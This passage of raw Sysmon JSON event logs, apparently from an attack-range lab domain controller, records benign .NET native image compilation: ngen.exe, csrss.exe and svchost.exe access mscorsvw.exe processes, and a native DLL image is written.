Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00103A910F00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00103A910F00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00103A910F00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.100\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00103A910F00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.100","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00103A910F00}","TargetProcessId":"4468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7942,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.131\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001083940F00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.131","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001083940F00}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7943,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.131\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001083940F00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.131","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001083940F00}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7944,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.147\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-001083940F00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.147","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-001083940F00}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7945,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:42.303\r\nProcessGuid: {41C8662E-2292-5F25-0000-001083940F00}\r\nProcessId: 4812\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12cc-0\\System.Runtime.Caching.dll\r\nCreationUtcTime: 2020-08-01 08:06:42.303","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:42.303","ProcessGuid":"{41C8662E-2292-5F25-0000-001083940F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12cc-0\\System.Runtime.Caching.dll","CreationUtcTime":"2020-08-01 08:06:42.303","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7946,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.350\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001018DD0E00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.350","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001018DD0E00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7947,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.350\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001018DD0E00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.350","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001018DD0E00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.350\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001018DD0E00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 